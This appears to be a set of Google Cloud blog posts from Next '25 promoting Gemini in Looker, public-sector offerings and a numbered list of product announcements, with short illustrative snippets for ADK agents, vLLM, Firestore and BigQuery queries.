A critical component of Looker’s AI architecture is the LookML semantic modeling layer. In conjunction with LLMs like Gemini, it provides the context the LLM needs to comprehend the data, and helps ensure centralized metric definitions, preventing inconsistencies that can derail AI models. Without a semantic layer, AI answers may be inaccurate, leading to unreliable results, lack of adoption, and wasted effort. Looker’s semantic model enables data governance integration, maintaining compliance and trust with existing controls, and evolves with your business, iteratively updating datasets and measures so that AI answers stay accurate. According to our own internal tests, Looker’s semantic layer reduces data errors in gen AI natural language queries by as much as two-thirds.
How Google protects your data and privacy
You can use Gemini in Looker knowing that your data is protected. Gemini prioritizes data privacy, and does not store customer prompts and outputs without permission. Critically, customer data, including prompts and generated output, is never used to train Google’s generative AI models.
Looker’s agentic AI architecture powers intelligent BI
Announced at Next 25, the Looker Conversational Analytics API serves as the agentic backend for Looker AI. It answers analytical questions using a reasoning agent equipped with multiple tools, uses conversation history to answer multi-turn questions, and enables more efficient Looker queries, including the ability to open them in the Explore UI.
Looker’s AI architecture is designed for accuracy and quality, taking a multi-pronged approach to gen AI quality:
Agentic reasoning
A semantic layer foundation
A dynamic knowledge graph that provides context for Retrieval Augmented Generation (RAG)
Fine-tuned models for SQL and Python generation
This robust architecture enables Looker to move beyond simply answering “What?” questions to addressing more complex queries like “How does this compare?” “Why?” “What will happen?” and ultimately, “What should we do?”
Looker’s AI and BI roadmap
With Looker, we’re committed to converging AI and BI, and are working on a number of new offerings including:
Code Interpreter for Conversational Analytics makes advanced analytics easy, enabling business users to perform complex tasks like forecasting and anomaly detection using natural language, without needing in-depth Python expertise. You can learn more about this new capability and sign up here for the Preview.
Centralize and share your Looker agents with Agentspace, which offers centralized access, faster deployment, enhanced team collaboration, and secure governance.
Automated semantic model generation with Gemini helps democratize LookML creation, boost developer productivity, and unlock data insights with multi-modal inputs. Gemini leverages diverse input types like natural language descriptions, SQL queries, and database schemas.
Embracing BI’s AI-powered future
Gemini in Looker is a significant milestone in the AI/BI revolution. By integrating the power of Google’s Gemini models with Looker’s robust data modeling and analytics capabilities, organizations can empower their analysts, enhance the productivity of their business users, and unlock deeper, more actionable insights from their data. Gemini in Looker is transforming how we understand and leverage data to make smarter, more informed decisions. The journey from asking “What?” to confidently determining “What next?” is now within reach, powered by Gemini in Looker. Learn more at https://cloud.google.com/looker, or click here to learn more about Gemini in Looker and how to enable it for your Looker deployment. You can also choose to enable Trusted Tester features to gain access to early features in development.
We’re at an inflection point right now, where every industry and entire societies are witnessing sweeping change, with AI as the driving force. This isn’t just about incremental improvements; it’s about total transformation. The public sector is already experiencing this shift, and the pace will only intensify. This is the promise of AI, and it’s here and now. At our recent Google Cloud Next ‘25, we showcased our latest innovations and reinforced our commitment to bringing the latest and best technologies to help public sector agencies meet their missions.
Key public sector announcements at Next
It was an exciting week at Next ‘25 with hundreds of product and customer announcements from Google Cloud. Here are key AI, security, and productivity announcements that can help the public sector deliver improved services, enhance decision-making and operate with greater efficiency.
Advancements in Google Distributed Cloud (GDC) that let customers bring Gemini models on premises. This complements our GDC air-gapped product, which is now authorized for U.S. Government Secret and Top Secret levels, makes Gemini available, and provides the highest levels of security and compliance. Together, these advances give public sector agencies greater flexibility in how and where they access the latest Google AI innovations.
Support for a full suite of generative media models and Gemini 2.5. Our most intelligent model yet, Gemini 2.5 is designed for the agentic era and is now available in the Vertex AI platform. This builds on our recent announcement that Vertex AI Search and generative AI (with Gemini) achieved FedRAMP High authorization, providing agencies with a secure platform and the latest AI innovations and capabilities.
Simplifying security with the launch of Google Unified Security. We are offering customers an AI-powered security solution that brings together our best-in-class security products for threat intelligence, security operations, cloud security, and secure enterprise browsing, along with Mandiant expertise, to provide a unified view and improved threat detection across complex infrastructures.
Transforming agency productivity and unlocking significant savings. We are offering Google Workspace, our FedRAMP High-authorized communication and collaboration platform, at a significant discount of 71% off for U.S. federal government agencies. Combined with Gemini in Workspace being authorized at the FedRAMP High level, this offering gives U.S. government workers unprecedented access to cutting-edge AI services.
Helping customers meet their mission
All of this incredible technology – and more – came to life on stage and across the show floor at our Google Public Sector Hub, where we showcased our solutions for security, defense, transportation, productivity & automation, education, citizen services, health & human services, and Google Distributed Cloud (GDC). In case you missed our live demos on Medicaid redetermination, unemployment insurance claims, transportation coordination, and research grant sourcing, contact us to schedule a virtual demo or discuss a pilot. To get hands-on with the technology, register for an upcoming Google Cloud Days training for the public sector here.
We are proud to work with customers across the public sector as they apply the latest Google innovations and technologies to achieve real mission-value impact. Ai2 announced a partnership with Google Cloud to make its portfolio of open AI models available in Vertex AI Model Garden. The collaboration will help set a new standard for openness, pairing Google Cloud’s infrastructure resources and AI development platform with Ai2’s open models to advance AI research and offer enterprise-quality deployment for the public sector. This builds on our announcement that Ai2 and Google Cloud will commit $20M to advance AI-powered research for the Cancer AI Alliance. You can catch the highlights from my conversation at Next with Ali Farhadi, CEO of Ai2, here.
CEO perspectives: A new era of AI-powered research and innovation
All of this incredible innovation with our customers is further enabled by our ecosystem of partners who help us scale our impact across the public sector. At Google Cloud Next, Accenture Federal Services and Google Public Sector announced the launch of a joint Managed Extended Detection and Response (MxDR) solution. The new MxDR for government solution integrates Google Security Operations (SecOps) platform with Accenture Federal’s deep federal cybersecurity expertise. This solution uses security-specific generative artificial intelligence (Gen AI) to significantly enhance threat detection and response, and the overall security posture for federal agencies.
Lastly, Lockheed Martin and Google Public Sector also announced a collaboration to advance generative AI for national security. Integrating Google’s advanced generative artificial intelligence into Lockheed Martin’s AI Factory ecosystem will enhance Lockheed Martin’s ability to train, deploy, and sustain high-performance AI models and accelerate AI-driven capabilities in critical national security, aerospace, and scientific applications.
A new era of innovation and growth
AI presents a unique opportunity to enter a new era of innovation and economic growth, enabling the public sector to get more out of limited resources to improve public services and infrastructure, make public systems more secure, and better meet the needs of their constituents. Harnessing the power of AI can help governments become agile and more secure, and serve citizens better. At Google Public Sector, we’re passionate about applying the latest cloud, AI and security innovations to help you meet your mission.
Subscribe to our Google Public Sector Newsletter to stay informed and stay ahead with the latest updates, announcements, events and more.
Google Cloud Next 25 took place this week and we’re all still buzzing! It was a jam-packed week in Las Vegas complete with interactive experiences, including more than 10 keynotes and spotlights, 700 sessions, and 350+ sponsoring partners joining us for an incredible Expo show. Attendees enjoyed hands-on learning across AI innovation, data cloud, modern infrastructure, security, Google Workspace, and more.
At our opening keynote, we showcased cutting-edge product innovations across our AI-optimized platform and featured hundreds of customers and partners building with Google Cloud as well as five awesome demos. You can catch up on all the highlights in our 10-minute keynote recap.
Our developer keynote showed how AI is revolutionizing the developer workflow, and featured seven incredible demos on everything from building with Gemini to creating multi-agent systems.
Last year, we shared how customers were exploring the exciting potential of generative AI to transform the way they work. This year, we showcased how customers are getting real business value from Google AI, celebrating hundreds of customer stories across the event, including the amazing story of how The Sphere is using Google AI to enrich their fully immersive The Wizard of Oz experience.
It was a busy week, so we’ve prepared a summary of all 228 announcements from Next ‘25 below:
AI and Multi-Agent Systems
Models: Building on Google DeepMind research, we announced the addition of a variety of first-party models, as well as new third-party models to Vertex AI Model Garden.
1. Gemini 2.5 Pro is available in public preview on Vertex AI, AI Studio, and in the Gemini app. Gemini 2.5 Pro is engineered for maximum quality and tackling the most complex tasks demanding deep reasoning and coding expertise. It is ranked #1 on Chatbot Arena.
2. Gemini 2.5 Flash — our low-latency, most cost-efficient thinking model — is coming soon to Vertex AI, AI Studio, and the Gemini app.
3. Imagen 3: Our highest quality text-to-image model now has improved image generation and inpainting capabilities for reconstructing missing or damaged portions of an image.
5. Lyria: The industry’s first enterprise-ready, text-to-music model, transforms simple text prompts into 30-second music clips.
6. Veo 2: Our advanced video generation model has new editing and camera control features to help customers refine and repurpose video content with precision.
9. Vertex AI Dashboards: These help you monitor usage, throughput, latency, and troubleshoot errors, providing you with greater visibility and control.
10. Model Customization and Tuning: You can also manage custom training and tuning with your own data on top of foundational models in a secure manner across all first-party model families including Gemini, Imagen, Veo, embedding, and translation models, as well as open models like Gemma, Llama, and Mistral.
11. Vertex AI Model Optimizer: Automatically generates the highest-quality response for each prompt based on your desired balance of quality and cost.
12. Live API: Offers streaming audio and video directly into Gemini. Now your agents can process and respond to rich media in real time, opening new possibilities for immersive, multimodal applications.
13. Vertex AI Global Endpoint: Provides capacity-aware routing for our Gemini models across multiple regions, maintaining application responsiveness even during peak traffic or regional service fluctuations.
We also introduced new capabilities to help you build and manage multi-agent systems — regardless of which technology framework or model you’ve chosen.
14. Agent Development Kit (ADK): This open-source framework simplifies the process of building sophisticated multi-agent systems while maintaining precise control over agent behavior. Agent Development Kit supports the Model Context Protocol (MCP), which provides a unified way for AI models to access and interact with various data sources and tools, rather than requiring custom integrations for each. (A minimal agent sketch follows this list.)
15. Agent2Agent (A2A) protocol: We’re proud to be the first hyperscaler to create an open Agent2Agent protocol to help enterprises support multi-agent ecosystems, so agents can communicate with each other, regardless of the underlying framework or model. More than 50 partners, including Accenture, Box, Deloitte, Salesforce, SAP, ServiceNow, and TCS are actively contributing to defining this protocol, representing a shared vision of multi-agent systems.
16. Agent Garden: This collection of ready-to-use samples and tools is directly accessible in ADK. Leverage pre-built agent patterns and components to accelerate your development process and learn from working examples.
17. Agent Engine: This fully managed agent runtime in Vertex AI helps you deploy your custom agents to production with built-in testing, release, and reliability at a global, secure scale.
18. Grounding with Google Maps: For agents that rely on geospatial context, you can now ground your agents with Google Maps, so they can provide responses with geospatial information tied to places in the U.S.
19. Customer Engagement Suite: This latest version includes human-like voices; the ability to understand emotions so agents can adapt better during conversation; streaming video support so AI agents can interpret and respond to what they see in real-time through customer devices; and AI assistance to build agents in a no-code interface.
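To give a feel for item 14, here is a minimal single-agent sketch with ADK’s Python package (pip install google-adk). The tool and its return value are illustrative stubs, and constructor arguments may vary across ADK releases.

```python
# Minimal sketch of an ADK agent exposing one Python function as a tool.
# The tool body is a stub; a real agent would call a live data source.
from google.adk.agents import Agent

def get_order_status(order_id: str) -> dict:
    """Look up the status of an order (stubbed for illustration)."""
    return {"order_id": order_id, "status": "shipped"}

root_agent = Agent(
    name="order_status_agent",
    model="gemini-2.0-flash",  # any supported Gemini model ID
    description="Answers questions about customer orders.",
    instruction="Use the get_order_status tool to answer order questions.",
    tools=[get_order_status],
)

# Run locally with the ADK CLI, e.g. `adk run` or the `adk web` dev UI.
```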
We announced exciting enhancements to Google Agentspace to help scale the adoption of enterprise search and AI agents across the enterprise. Agentspace puts the latest Google foundation models, Google-quality search, powerful AI agents, and actionable enterprise knowledge in the hands of every employee.
20. Integrated with Chrome Enterprise: Bringing Agentspace directly into Chrome helps employees easily and securely find information, including data and resources, right within their existing workflows.
21. Agent Gallery: This provides employees a single view of available agents across the enterprise, including those from Google, internal teams, and partners — making agents easy to discover and use.
22. Agent Designer: A no-code interface for creating custom agents that automate everyday work tasks or enhance knowledge. Agent Designer helps employees adapt agents to their individual workflows and needs, no matter their technical experience.
23. Idea Generation agent: Helps employees innovate by autonomously developing novel ideas in any domain, then evaluating them to find the best solutions via a competitive system inspired by the scientific method.
24. Deep Research agent: Explores complex topics on the employee’s behalf, synthesizing information across internal and external sources into comprehensive, easy-to-read reports — all with a single prompt.
We brought the best of Google DeepMind and Google Research together with new infrastructure and AI capabilities in Google Cloud, including:
25. AlphaFold 3: Developed by Google DeepMind and Isomorphic Labs, the new AlphaFold 3 High-Throughput Solution, available for non-commercial use and deployable via Google Cloud Cluster Toolkit, enables efficient batch processing of up to tens of thousands of protein sequences while minimizing cost through autoscaling infrastructure.
26. WeatherNext AI models: Google DeepMind and Google Research WeatherNext models enable fast, accurate weather forecasting, and are now available in Vertex AI Model Garden, allowing organizations to customize and deploy them for various research and industry applications.
27. Ironwood: Our 7th-generation TPU joins our AI-optimized hardware portfolio to power thinking, inferential AI models at scale (coming later in 2025). Read more here.
28. Google Distributed Cloud (GDC): We have partnered with NVIDIA to bring Gemini to NVIDIA Blackwell systems, with Dell as a key partner, so Gemini can be used locally in air-gapped and connected environments. Read more here.
29. Pathways on Cloud: Developed by Google DeepMind, Pathways is a distributed runtime that powers all of AI at Google, and is now available for the first time on Google Cloud.
30. vLLM on TPU: We’re bringing vLLM to TPUs to make it easy to run inference on TPUs. Customers who have optimized PyTorch with vLLM can now run inference on TPUs without changing their software stack, and can also serve on both TPUs and GPUs if needed. (See the sketch after this list.)
31. Dynamic Workload Scheduler resource management and job scheduling platform now features support for Trillium, TPU v5e, A4 (NVIDIA B200), and A3 Ultra (NVIDIA H200) VMs in preview via Flex Start mode, with Calendar mode support for TPUs coming later this month.
32. A4 and A4X VMs: We’ve significantly enhanced our GPU portfolio with the availability of A4 and A4X VMs powered by NVIDIA’s B200 and GB200 Blackwell GPUs, respectively, and A4X VMs are now in preview. We were the first cloud provider to offer both of these options.
33. NVIDIA Vera Rubin GPUs: Google Cloud will be among the first to offer NVIDIA’s next-generation Vera Rubin GPUs, which offer up to 15 exaflops of FP4 inference performance per rack.
34. Cluster Director (formerly Hypercompute Cluster) lets you deploy and manage a group of accelerators as a single unit with physically colocated VMs, targeted workload placement, advanced cluster maintenance controls, and topology-aware scheduling. New updates coming later this year include Cluster Director for Slurm, 360° observability features, and job continuity capabilities. Register to join the preview.
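As a concrete illustration of the portability claim in item 30, here is a standard vLLM offline-inference snippet; per the announcement, code like this is intended to run on TPU backends without modification. The model name is only an example.

```python
# Minimal sketch: standard vLLM offline inference. Per item 30, the same
# code path is intended to serve on TPUs or GPUs without changes.
from vllm import LLM, SamplingParams

llm = LLM(model="meta-llama/Llama-3.1-8B-Instruct")  # example model
params = SamplingParams(temperature=0.7, max_tokens=64)

outputs = llm.generate(["What is an in-memory database?"], params)
for output in outputs:
    print(output.outputs[0].text)
```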
Application Development
Developing on top of Google Cloud, and with Google Cloud tools, gets better every day.
35. The new Application Design Center, now in preview, provides a visual, canvas-style approach to designing and modifying application templates, and lets you configure application templates for deployment, view infrastructure as code in-line, and collaborate with teammates on designs.
36. The new Cloud Hub service, in preview, is the central command center for your entire application landscape, providing insights into deployments, health and troubleshooting, resource optimization, maintenance, quotas and reservations, and support cases. Try Cloud Hub here.
38. Application Monitoring, in public preview, supports automatically tagging telemetry (logs, metrics, and traces) with application context, application-aware alerts, and out-of-the-box application dashboards.
39. Cost Explorer, in private preview, provides visibility into granular application costs and utilization metrics, allowing you to identify efficiency opportunities; sign up here to try it out.
40. Gemini Code Assist agents can help with common developer tasks such as code migration, new feature implementation, code review, test generation, model testing, and documentation, and their progress can be tracked on the new Gemini Code Assist Kanban board.
41. Gemini Code Assist is now available in Android Studio for professional developers who want AI coding assistance with enterprise security and privacy features.
42. Gemini Code Assist tools, now in preview, help you access information from Google apps and tools from partners including Atlassian, Sentry, Snyk, and more.
43. An App Prototyping agent in preview for Gemini Code Assist within the new Firebase Studio development environment turns your app ideas into fully functional prototypes, including the UI, backend code, and AI flows.
44. Gemini Cloud Assist is integrated with Application Design Center in preview to accelerate application infrastructure design and deployment.
45. Gemini Cloud Assist Investigations leverages data in your cloud environment to accelerate troubleshooting and issue resolution. Register for the private preview here.
46. Gemini Cloud Assist is now integrated across Google Cloud services including Storage Insights, Cloud Observability, Firebase, Database Center, Flow Analyzer, FinOps Hub, as well as security- and compliance-related services.
47. FinOps Hub 2.0 now includes waste insights and cost optimization opportunities from Gemini Cloud Assist.
48. The new Enterprise tier of the Google Developer Program is in limited preview, providing a safe and affordable way to explore Google Cloud and its AI products for a set cost of $75 per month, per seat. Learn more here.
Compute
Whatever your workload, there’s a Compute Engine virtual machine to help you run it at the price, performance and reliability levels you need.
49. New C4D VMs built on AMD’s 5th Gen EPYC processors and paired with Google Titanium deliver impressive performance gains over prior generations — up to 30% vs. C3D on the estimated SPECrate®2017_int_base benchmark. Currently in preview, try out C4D today.
50. C4 VMs built on the 6th generation Intel Granite Rapids CPUs feature the highest frequency of any Compute Engine VM — up to 4.2 GHz.
51. C4 shapes with Titanium Local SSD offer improved performance for I/O-intensive workloads like databases and caching layers, achieving Local SSD latency reductions of up to 35%.
52. C4 bare metal instances provide performance gains of up to 35% for general compute and up to 65% for ML recommendation workloads compared to the prior generation.
53. New, larger C4 VM shapes scale up to 288 vCPU, with 2.2TB of high-performing DDR5 memory and larger cache sizes. Request preview access here.
Compute Engine also features a variety of specialized VM families and unique capabilities:
54. New H4D VMs for demanding HPC workloads are built on 5th Gen AMD EPYC CPUs, and offer the highest whole-node VM performance of our VM families at more than 12,000 gigaflops, along with the highest per-core performance and the best memory bandwidth at more than 950 GB/s. Sign up for the H4D preview.
55. M4 VMs are certified for business-critical, in-memory SAP HANA workloads ranging from 744GB to 3TB, and for SAP NetWeaver Application Server, and offer up to 65% better price-performance and 2.25x more SAP Application Performance Standard (SAPS) compared to the previous memory-optimized M3.
56. The Z3 storage-optimized family now features new Titanium SSDs and offers nine new smaller shapes, ranging from 3TB to 18TB per instance. The Z3 family is also introducing new storage-optimized bare-metal instances, which include up to 72TB of Titanium SSD and direct access to the physical server’s CPUs. Now in preview; register your interest here.
57. Nutanix Cloud Clusters (NC2) on Google Cloud let you run, manage, and operate apps, data, and AI across private and public clouds. Sign up for the public preview here.
58. Google Cloud VMware Engine now comes in 18 additional node shapes, bringing the total number of node shapes across VMware Engine v1 and v2 to 26.
59. Within the Titanium family, Titanium ML Adapter securely integrates NVIDIA ConnectX-7 network interface cards (NICs), providing 3.2 Tbps of non-blocking GPU-to-GPU bandwidth.
60. Titanium offload processors now integrate our GPU clusters with the Jupiter data center fabric, for greater cluster scale.
62. MIGs now support committed use discounts (CUDs) and reservation sharing with Vertex AI and Autopilot.
Containers & Kubernetes
The case for running on Google Kubernetes Engine (GKE) keeps getting stronger across an ever-expanding class of workloads, most recently — AI.
63. GKE Inference Gateway offers intelligent scaling and load balancing, helping you handle request scheduling and routing with gen AI model-aware scaling and load-balancing techniques.
64. With GKE Inference Quickstart, you can choose an AI model and your desired performance, and GKE configures the right infrastructure, accelerators, and Kubernetes resources to match.
66. Cluster Director for GKE (formerly Hypercompute Cluster) is now generally available, letting you deploy and manage large clusters of accelerated VMs with compute, storage, and networking — all operating as a single unit.
67. We announced performance improvements to GKE Autopilot, including faster pod scheduling, scaling reaction time, and capacity right-sizing.
68. Starting in Q3, Autopilot’s container-optimized compute platform will also be available to standard GKE clusters, without requiring a specific cluster configuration.
Customers
We shared hundreds of new customer stories across every industry and region, highlighting the ways they’re using Google Cloud to drive real impact. Here are some highlights:
69. Agoda, one of the world’s largest digital travel platforms, creates unique visuals and videos of travel destinations with Imagen and Veo on Vertex AI.
70. Bayer built an agent that uses predictive AI and advanced analytics to predict flu trends.
71. Bending Spoons integrated Imagen 3 into its Remini app to launch a popular new AI filter, processing an astounding 60 million photos per day.
72. Bloomberg Connects is using Gemini to explore new ways to help museums and other cultural institutions make their digital content accessible to more visitors.
73. Citi is using Vertex AI to rapidly deploy generative AI-powered productivity tools to more than 150,000 employees.
74. DBS, a leading Asian financial services group, is using Customer Engagement Suite to reduce customer call handling times by 20%.
75. Deutsche Bank built DB Lumina, a new Gemini-powered tool that can synthesize financial data and research, turning, for example, a report that’s hundreds of pages into a one-page brief, and delivering it in a matter of seconds to traders and wealth managers.
76. Deutsche Telekom has announced an expanded strategic partnership with Google Cloud, focusing on cloud and AI integration to modernize Deutsche Telekom’s IT, networks, and business applications, including migrating its SAP landscape.
77. Dun & Bradstreet is using Security Command Center to centralize monitoring of AI security threats.
78. Fanatics is partnering with Google Cloud to use AI technology to enhance every aspect of the fan journey. With Vertex AI Search for Commerce, Fanatics has developed an intelligent search ecosystem that understands and anticipates fan preferences, improves quality assurance and delivers intelligent customer service, and more.
79. Freshfields is using Gemini for Google Workspace and Google Cloud’s Vertex AI to enhance client services, including powering Freshfields’ Dynamic Due Diligence solution.
80. Globo, Latin America’s largest media company, used Vertex AI Search to create a recommendations experience inside its streaming platform that more than doubled their click-through-play rate on videos.
81. Gordon Food Services is simplifying insight discovery and recommending next steps with Agentspace.
82. The Home Depot built Magic Apron, an agent that offers expert guidance 24/7, providing detailed how-to instructions, product recommendations, and review summaries to make home improvement easier.
83. Honeywell has incorporated Gemini into its product development.
84. KPMG is building Google AI into its newly formed KPMG Law firm and implementing Agentspace to enhance its own workplace operations.
85. L’Oreal is using Gemini, Imagen and Veo to accelerate creative ideation and production for marketing and product design, significantly speeding up workflows while maintaining ethical standards.
86. Lloyds Banking Group has taken a significant step in its strategic transformation by migrating its major platforms to Google Cloud. The transition is unlocking new opportunities to innovate with AI, enhancing the customer experience.
87. Lowe’s is revolutionizing product discovery with Vertex AI Search to generate dynamic product recommendations and address customers’ complex search queries.
89. Nokia built a coding tool to speed up app development with Gemini, enabling developers to create 5G applications faster.
90. Nuro, an autonomous driving company, uses vector search in AlloyDB to identify challenging scenarios on the road.
91. Mercado Libre deployed Vertex AI Search across 150M items in three pilot countries, helping its 100M customers find the products they love faster and already delivering millions of dollars in incremental revenue.
92. Papa Johns is using AI to transform the ordering and delivery experience for its global customers. With Google Cloud’s AI, data analytics, and machine learning capabilities, Papa Johns can anticipate customer needs and personalize their pizza experience, as well as provide a consistent customer experience both inside the restaurants and online.
93. Reddit is using Gemini on Vertex AI to power “Reddit Answers,” Reddit’s AI-powered conversation platform. Additionally, Reddit is using Enterprise Search to improve its homepage experience.
94. Samsung is integrating Gemini on Google Cloud into Ballie, its newest AI home companion robot, enabling more personalized and intelligent interactions for users.
95. Seattle Children’s Hospital is launching Pathway Assistant, a gen AI-powered agent with Gemini that improves clinicians’ access to complex information and the latest evidence-based best practices needed to treat patients.
96. The Government of Singapore uses Google Cloud Web Risk to protect its residents online.
97. The Wizard of Oz at The Sphere is an immersive experience that reconceptualizes the 1939 film classic through the magic of AI, bringing it to life on a whole new scale for the colossal 160,000-square-foot domed screen at The Sphere in Las Vegas. It’s a collaboration between Sphere Entertainment, Google DeepMind, Google Cloud, Hollywood production company Magnopus, and five others.
98. Spotify uses BigQuery to harness enormous amounts of data to deliver personalized experiences to over 675 million users worldwide.
99. Intuit is using Google Cloud’s Document AI and Gemini models to simplify tax preparation for millions of TurboTax consumers this tax season, ultimately saving time and reducing errors.
100. United Wholesale Mortgage is using Google Cloud’s gen AI and data analytics to improve the mortgage process for 50,000 mortgage brokers and their clients, focusing on speed, efficiency, and personalized service.
101. Verizon is using Google Cloud’s Customer Engagement Suite to enhance its customer service for more than 115 million connections with AI-powered tools, like the Personal Research Assistant.
102. Vodafone used Vertex AI along with open-source tools and Google Cloud’s security foundation to establish an AI security governance layer.
103. Wayfair updates product attributes 5x faster with Vertex AI.
104. WPP built Open as a platform powered by Google models that all of its employees worldwide can use to concept, produce, and measure campaigns.
106. The next generation of AlloyDB natural language lets you query structured data in AlloyDB securely and accurately, enabling a natural language text modality in apps.
108. AlloyDB AI includes three new AI models: one that improves the relevance of vector search results using cross-attention reranking; a multimodal embeddings model that supports text, images, and videos; and a new Gemini Embedding text model.
109. The new AlloyDB AI query engine lets developers use natural language expressions and constructs within SQL queries. Sign up for the preview of these AlloyDB features here.
111. Firestore with MongoDB compatibility, in preview, lets developers take advantage of MongoDB’s API portability along with Firestore’s multi-region replication with strong consistency, virtually unlimited scalability, a 99.999% SLA, and single-digit millisecond read latency (see the sketch at the end of this list). Get started here today.
112. The new Oracle Base Database Service offers a flexible and controllable way to run Oracle Databases in the cloud.
113. Oracle Exadata X11M is now GA, bringing the Oracle Exadata platform to Google Cloud and adding additional enterprise-ready capabilities, including customer managed encryption keys (CMEK).
114. Database Migration Service (DMS) now supports SQL Server to PostgreSQL migrations for Cloud SQL and AlloyDB, allowing you to fully execute on your database modernization strategy.
115. Cloud SQL and AlloyDB are available on C4A instances powered by our Arm-based Google Axion processors, delivering higher price-performance and throughput. Learn more here.
116. Database Center is now generally available and supports every database in our portfolio, providing a unified, AI-powered fleet management solution.
117. Spanner vector search is now generally available, designed to work with our SQL, Graph, Key-Value, and Full-Text Search modalities.
118. Graph Visualization for Spanner is now generally available, allowing users to visually explore valuable information from graph data.
120. Aiven for AlloyDB Omni, a fully-managed AlloyDB Omni service from our partner Aiven that runs on AWS, Azure, and Google Cloud, is now generally available.
122. New Cassandra-compatible APIs and live-migration tooling for zero-downtime migrations from Cassandra to Bigtable and Spanner.
123. Memorystore for Valkey is now generally available, with support for 7.2 and 8.0 engine versions.
124. Firebase Data Connect is now GA, offering the reliability of Cloud SQL for PostgreSQL with instant GraphQL APIs and type-safe SDKs.
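As an aside, here is a minimal, hedged sketch of what the MongoDB compatibility in item 111 enables; the endpoint format and database details below are assumptions for illustration, not a verified recipe:

```python
# Hedged sketch: connecting to Firestore's MongoDB-compatible endpoint with a
# standard MongoDB driver (pip install pymongo). The connection-string format
# below is an assumption; check the Firestore docs for the exact endpoint and
# auth options for your database.
from pymongo import MongoClient

client = MongoClient(
    "mongodb://my-database-uid.us-central1.firestore.goog:443/mydb"
    "?loadBalanced=true&tls=true&retryWrites=false"
)
users = client["mydb"]["users"]
users.insert_one({"name": "Ada", "email": "ada@example.com"})
print(users.find_one({"name": "Ada"}))
```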
Data analytics
We announced several new innovations with our autonomous data to AI platform powered by BigQuery, alongside our unified, trusted, and conversational Looker BI platform:
127. BigQuery anomaly detection, now in preview, maintains data quality and automates metadata generation.
128. Data science agent, now GA and embedded within Google’s Colab notebook, provides intelligent model selection, scalable training, and faster iteration.
131. BigQuery knowledge engine, in preview, leverages Gemini to analyze schema relationships, table descriptions, and query histories to generate metadata on the fly, model data relationships, and recommend business glossary terms.
132. BigQuery semantic search is now GA, providing AI-powered data insights across BigQuery and grounding AI and agents in business context.
133. BigQuery’s contribution analysis feature, now GA, helps you pinpoint the key factors (or combinations of factors) responsible for the most significant changes in a metric.
135. BigQuery pipe syntax is GA, letting you apply operators in any order and as often as you need, and is compatible with most standard SQL operators.
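To make the pipe syntax in item 135 concrete, here is a hedged sketch that runs the same aggregation written both ways through the BigQuery Python client; the project, table, and column names are hypothetical:

```python
# Minimal sketch of BigQuery pipe syntax vs. standard SQL, using the
# google-cloud-bigquery client; table and columns are hypothetical.
from google.cloud import bigquery

client = bigquery.Client()

# Standard SQL: clause order is fixed (SELECT ... FROM ... WHERE ... GROUP BY).
standard = """
SELECT status, COUNT(*) AS n
FROM `my_project.shop.orders`
WHERE order_date >= '2025-01-01'
GROUP BY status
ORDER BY n DESC
"""

# Pipe syntax: operators apply top to bottom, in any order, as often as needed.
piped = """
FROM `my_project.shop.orders`
|> WHERE order_date >= '2025-01-01'
|> AGGREGATE COUNT(*) AS n GROUP BY status
|> ORDER BY n DESC
"""

for row in client.query(piped).result():
    print(row.status, row.n)
```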
Then, for data science and analyst teams, we added AI-driven data science and workflows as part of BigQuery notebook:
136. New intelligent SQL cells understand your data’s context and provide smart suggestions as you write code, and let you join data sources directly within your notebook.
137. Native exploratory analysis and visualization capabilities in BigQuery make it easy to explore data and collaborate with colleagues. Data scientists can also schedule analyses to run and refresh insights periodically.
138. The new BigQuery AI query engine lets data scientists process structured and unstructured data together with added real-world context, co-processing traditional SQL alongside Gemini to inject runtime access to real-world knowledge, linguistic understanding, and reasoning abilities.
139. Google Cloud for Apache Kafka, now GA, facilitates real-time data pipelines for event sourcing, model scoring, messaging and real-time analytics.
141. New dataset-level insights in BigQuery data canvas, in preview, surface hidden relationships between tables and generate cross-table queries by integrating query usage analysis and metadata.
142. BigQuery ML includes the new AI.GENERATE_TABLE function, in preview, to capture the output of LLM inference within SQL clauses (see the sketch after this list).
144. BigQuery vector search includes a new index type, now GA, based on Google’s ScaNN model that’s coupled with a CPU-optimized distance computation algorithm for scalable, faster and more cost-efficient processing.
145. The preview of BigQuery ML’s pre-trained TimesFM model developed by Google Research simplifies time-series forecasting.
146. We integrated new Google Maps Platform datasets directly into BigQuery, to make it easier for data analysts and decision makers to access insights.
147. In addition, Earth Engine in BigQuery brings the best of Earth Engine’s geospatial raster data analytics directly into BigQuery. Learn more here.
148. GrowthLoop introduced its Compound Marketing Engine built on BigQuery with Growth Agents powered by Gemini, so marketing can build personalized audiences and journeys that drive rapidly compounding growth.
149. Informatica expanded its services on Google Cloud to enable sophisticated analytical and AI governance use cases.
150. Fivetran introduced its Managed Data Lake Service for Cloud Storage, with native integration with BigQuery metastore and automatic data conversion to open table formats like Apache Iceberg and Delta Lake.
151. DBT is now integrated with BigQuery DataFrames, and DBT Cloud is now available on Google Cloud.
152. Datadog introduced expanded monitoring capabilities for BigQuery, providing granular visibility into query performance, usage attribution, and data quality metrics.
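Returning to item 142, here is a hedged sketch of AI.GENERATE_TABLE turning free-text rows into structured columns; the model, tables, and output schema are hypothetical, and the preview function’s surface may differ:

```python
# Hedged sketch of BigQuery ML's AI.GENERATE_TABLE (preview): capture LLM
# output as structured columns. Model, tables, and schema are hypothetical.
from google.cloud import bigquery

client = bigquery.Client()
sql = """
SELECT *
FROM AI.GENERATE_TABLE(
  MODEL `my_project.ml.gemini_model`,
  (SELECT review_text AS prompt FROM `my_project.shop.reviews`),
  STRUCT('sentiment STRING, rating INT64' AS output_schema)
)
"""
for row in client.query(sql).result():
    print(row.sentiment, row.rating)
```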
BigQuery’s autonomous data foundation provides governance, orchestration for diverse data workloads, and a commitment to flexibility via open formats. Announcements in this area include:
153. BigQuery makes unstructured data a first-class citizen with multimodal tables in preview, bringing rich, complex data types alongside structured data for unified storage and querying via the new ObjectRef data type.
154. BigQuery governance, in preview, provides a single, unified view for data stewards and professionals to handle discovery, classification, curation, quality, usage, and sharing.
156. BigQuery metastore, now GA, enables engine interoperability across BigQuery, Apache Spark, and Apache Flink engines, with support for the Iceberg Catalog.
157. BigQuery business glossary, now GA, lets you define and administer company terms, identify data stewards for these terms, and attach them to data asset fields.
158. BigQuery continuous queries, now GA, enable instant analysis and actions on streaming data using SQL, regardless of its original format.
159. BigQuery tables for Apache Iceberg, in preview, let you connect your Iceberg data to SQL, Spark, AI, and third-party engines.
